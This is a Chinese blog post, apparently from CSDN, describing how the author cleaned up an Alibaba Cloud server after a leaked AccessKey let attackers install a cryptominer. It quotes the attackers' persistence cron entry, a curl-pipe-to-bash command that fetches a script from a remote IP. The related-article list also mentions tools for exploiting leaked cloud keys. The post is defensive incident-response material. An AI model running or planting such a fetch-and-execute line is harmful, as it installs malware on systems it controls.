阿里云因Ak泄露,被攻击处理过程

最新推荐文章于 2024-04-23 10:04:40 发布
最新推荐文章于 2024-04-23 10:04:40 发布
阅读量1.8k 收藏 3
点赞数 3
分类专栏: Linux centos 服务器攻击 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caojiawei/article/details/128878952
版权
Linux 同时被 3 个专栏收录
1 篇文章 0 订阅
订阅专栏
centos
1 篇文章 0 订阅
订阅专栏
服务器攻击
1 篇文章 0 订阅
订阅专栏

根据阿里云后台安全预警,检查到系统出现紧急预警时间:恶意脚本代码执行,预警后发现SSh无法登录(ssh服务被杀掉),服务器瘫痪,重启服务器后能正常远程。

第一件事禁用掉泄露的AK,防止二次伤害

如果不想重启服务器可以通过阿里云的后台VNC应急远程登录到服务器,执行以下命令

systemctl start sshd

netstat -anpt |grep ssh

登录服务器后top发现CPU-100%,但是进程中午占用高得资源,考虑到有隐藏进程占用了cpu

安装htop命令

yum -y install htop

使用htop命令查看隐藏的进程,发现存在这大量的挖矿应用进程,根据进程找到目录所在位置,删除掉挖矿程序,并杀掉挖矿进程

挖矿程序在:/usr/share/ddns 使用rm -rf ddns进行删除

删除挖矿进程;kill -9  进程1 进程2 进程3........

此时CPU暂时恢复正常,但是过了30秒后,CPU再次上涨,此时htop查看进程,挖矿程序再次运行,ddns挖矿病毒再次运行,考虑系统中肯定存在后门再次下载了挖矿病毒

首先考虑是存在定时任务执行

使用 crontab -l 查看系统任务调度,果然存在一个远程下载的定时任务,这是个海外的地址

*/30 * * * * curl -fsSL http://209.141.42.48/d3f815/s/cronb.sh | bash > /dev/null 2>&1

删除调度任务,编辑/var/spool/cron/root文件

vi /var/spool/cron/root

但是尝试修改root文件,将里面的定时任务删除,依旧报错

 

 

使用lsattr 命令查看被限制修改的文件,这个目录正好是crontab任务的文件,最后一层root代表的是用户名称,如果使用czw账号设置的定时任务那需要进入到czw目录下操作

这里的a代表Append Only,系统只允许在这个文件之后追加数据,不允许任何进程覆盖或截断这个文件,i 代表文件不能删除,不能更改,不能移动

因此我们需要把对应文件的-ia权限删除,使用如下指令删除,如果是-i权限,将下面指令换成-i即可

再次编辑文件,保存成功

删除掉调度任务后,再次重复上面的步骤,删除掉挖矿程序ddns,杀掉挖矿的后台进程

 

 

caojiawei
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
阿里云ak/sk漏洞利用工具
06-27
方便可执行系统命令
阿里云及腾讯云通过AccessKey执行命令
02-11
阿里云及腾讯云通过AccessKey执行命令,已实现腾讯云返回命令执行结果
阿里云11.12重大故障原因曝光
让每个人用好数据和云
11-16 713
首先得澄清下,这里面至少是2次故障,淘宝的故障是发生在双十一当天晚上并上了热搜的,阿里云故障是双十一结束后,11.12号下午17:44分发生的,这也是为啥第二次热搜里面是。17:50:工程师确认故障是 AK 服务异常导致,影响云产品控制台、管控 API 调用异常,以及依赖 AK 服务的云产品服务运行异常。这次双十一期间阿里故障受到很多人关注,双11晚上淘宝崩了上热搜,11.12号下午17:44,淘宝又崩了,闲鱼崩了,18:07:开始执行恢复措施,包括修订白名单版本、重启 AK 服务。
一次OSS Accesskey泄露记录
weixin_59047731的博客
04-23 584
渗透千万条,安全第一条。操作不规范,亲人两行泪。
只想着一直调用一直爽, 那API凭证泄漏风险如何破? ...
测试0901-1
04-09 504
如今各家云厂商都通过给用户提供API调用的方式来实现一些自动化编排方面的需求。为了解决调用API过程中的通信加密和身份认证问题,大多数云厂商会使用同一套技术方案—基于非对称密钥算法的鉴权密钥对,这里的“密钥对”即API凭证,是云上用户调用云服务API、访问云上资源的唯一身份凭证。 在信息安全领域有一个广为认可的假定,即所有系统都是可攻破的,这里的“攻破”...
阿里云AK创建
m0_55877125的博客
08-02 1155
登录到阿里云控制台([https://www.aliyun.com/?请注意遵守阿里云的账号安全管理规范并妥善保管您的Access Key,以确保您的阿里云资源和数据的安全。将 Access Key AccessKey Secret保存即可。在 “RAM 访问控制” 页面,单击 “创建AccessKey”。点击右上方的主账号,点击“AccessKey管理”。再验证账号后即可出现以下页面;
云主机秘钥(ak/sk)泄露及利用案例
渗透测试研究中心
12-14 2582
云平台作为降低企业资源成本的工具,在当今各大公司系统部署场景内已经成为不可或缺的重要组成部分,并且由于各类应用程序需要与其他内外部服务或程序进行通讯而大量使用凭证或密钥,因此在漏洞挖掘过程中经常会遇到一类漏洞:云主机秘钥泄露。此漏洞使攻击者接管云服务器的权限,对内部敏感信息查看或者删除等操作。此篇文章围绕如何发现秘钥泄露、拿到秘钥后如何利用展开。ak、sk拿到后的利用,阿里云、腾讯云云主机通过使用AccessKey Id / Secret Access Key加密的方法来验证某个请求的发送者身份。
云主机AK/SK泄露利用
Fly_鹏程万里
10-20 1006
云主机通过使用Access Key Id/Secret Access Key加密的方法来验证某个请求的发送者身份,其中Access Key ID(AK)用于标示用户,Secret Access Key(SK)是用户用于加密认证字符串和云厂商用来验证认证字符串的密钥,其中SK必须保密,原理为对称加解密,云主机接收到用户的请求后系统将使用AK对应的相同的SK和同样的认证机制生成认证字符串并与用户请求中包含的认证字符串进行比对,如果认证字符串相同,系统认为用户拥有指定的操作权限并执行相关操作,如果不同则系统将忽略
React实现阿里云OSS上传文件的示例
11-19
阿里云 OSS 是 阿里云提供的海量、安全、低成本、高可靠的云存储服务,提供 99.9999999999%的数据可靠性(号称)。能够使用 RESTful API 可以在互联网任何位置存储和访问,支持容量和处理能力弹性扩展。 基本术语 1....
调用阿里云sunfire的api接口获取资源
最新发布
06-28
Jdk版本:17.0.9 ...访问方式:http://localhost:8088/sunfire/test?ak=”sunfire监控后台中Api账号的ak”&sk=”sunfire监控后台中Api账号的sk”&domain=”sunfire的域名”&query=”m ql语句见开发文档”
端到端安全阿里云容器服务云原生安全实践.pdf
04-10
在软件供应链安全上,阿里云推行集群策略治理,通过设置策略来规范应用部署和更新的过程,防止恶意软件的注入。结合云安全中心,可以实时检测和预防潜在的供应链攻击。云安全中心提供了丰富的安全规则和策略,帮助...
渗透测试实战—云渗透(AK/SK泄露
haosha。的博客
03-18 1316
渗透测试实战思路分享:getshell方法及横向移动方法,云安全(AK/SK泄露
AK泄露检测工具
weixin_46211944的博客
07-04 358
收集企业内部所有的AccessKeyId作为关键特征,借助 Github API 强大的代码搜索能力,通过定时任务检测关键特征,以发现可能的AK/SK泄露事件。(3)Syslog集成。
一个AK/SK泄露检测的实现思路
04-21 1745
01、简介在企业上云的过程中,AK/SK泄露导致的数据泄露事件屡见不鲜。在企业混合云架构下,公有云和私有云都存在大量的AccessKey,如何有效地检测可能的AK/SK泄露事件,一直困扰着企业的安全人员。本文提供了一种比较容易实现的思路,完成AK/SK泄露检测能力的构建,实现类似于阿里云云安全中心AK泄露检测的功能,检测GitHub平台公开源代码中是否包含企业所使用的AK/SK敏感信息。02、实现...
AK管理之进阶篇 - 如何有效控制云上[最后一把密钥]的风险?
热门推荐
阿里云云栖号
03-23 4万+
简介: 上一期“谈AK管理之基础篇”,我们讲了如何规范的进行访问密钥生命周期管理。通过分出不同权限的阿里云RAM子账号,将不同的权限分给不同的用户,这样一旦子账号泄露也不会造成全局的信息泄露。但是,由于子账号在一般情况下是长期有效的,因此,子用户的访问密钥也是不能泄露的。 一、引言: 上一期“谈AK管理之基础篇”,我们讲了如何规范的进行访问密钥生命周期管理。通过分出不同权限的阿里云RAM子账号,将不同的权限分给不同的用户,这样一旦子账号泄露也不会造成全局的信息泄露。但是,由于子账号在一般情况下是长期
你知道的黑k工具都有哪些(推荐入门网络安全的20种工具)
liuhyusb的博客
03-15 281
你知道的黑客工具都有哪些(推荐网络黑客的20种工具)
短信通知-阿里大鱼 申请AK 发送Until
mo念的博客
03-26 861
企业发送短信的时候: 1.) 运营商提供接口(Webservice、restful),运营商(移动、联通)帮你发(运营商,要求短信量非常大,每个月100w以上):优点:价格便宜,速度快。缺点:需要量大,运营商限制。 2.) 买短信猫(设备,第三方公司开发),调用短信猫的接口。(每个月1w,每条9分,10w-8分-20w-6分):优点:成本低,可以不需要大量短信。缺点:价格贵一些,不稳定,国家政策限...
前端不暴露ak/sk直接上传阿里云oss的方案
北亮的专栏
07-07 2394
介绍如何在不暴露ak/sk的情况下,使用javascript直接上传阿里云 oss的方案,并小小的吐槽一下
云主机秘钥泄露及利用
技术超强的网络安全平台
08-02 1898
云平台作为降低企业资源成本的工具,在当今各大公司系统部署场景内已经成为不可或缺的重要组成部分,并且由于各类应用程序需要与其他内外部服务或程序进行通讯而大量使用凭证或密钥,因此在漏洞挖掘过程中经常会遇到一类漏洞:云主机秘钥泄露。此漏洞使攻击者接管云服务器的权限,对内部敏感信息查看或者删除等操作。此篇文章围绕如何发现秘钥泄露、拿到秘钥后如何利用展开。云主机通过使用AccessKey Id / Secret Access Key加密的方法来验证某个请求的发送者身份。Access Key。
如何利用泄漏的阿里云ak/sk和token信息
06-13
如果阿里云AK/SK和Token泄漏,攻击者可以利用这些信息进行以下攻击: 1. 访问阿里云资源:攻击者可以使用泄露AK/SK或Token访问您的阿里云资源,包括云服务器、对象存储、数据库等,甚至可以进行恶意操作,比如删除数据、挂载云盘等。 2. 篡改数据:攻击者可以使用泄露AK/SK或Token篡改您的数据,比如在数据库中插入或删除数据,或者在对象存储中上传恶意文件。 3. 产生费用:攻击者可以使用泄露AK/SK或Token创建阿里云资源,比如创建云服务器、负载均衡等,从而产生费用。 4. 盗用账号:攻击者可以使用泄露AK/SK或Token获取更多的权限,比如创建新的临时AK/SK和Token,进一步扩大攻击面,最终可能导致整个账号被盗用。 因此,如果发现阿里云AK/SK和Token泄露,您应该立即采取措施,比如撤销已经分配的AK/SK或Token,修改账号密码等,以免受到攻击者的攻击。同时,也应该加强账号安全,避免泄露敏感信息,比如使用复杂的密码,定期更换密码,开启多因素身份认证等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值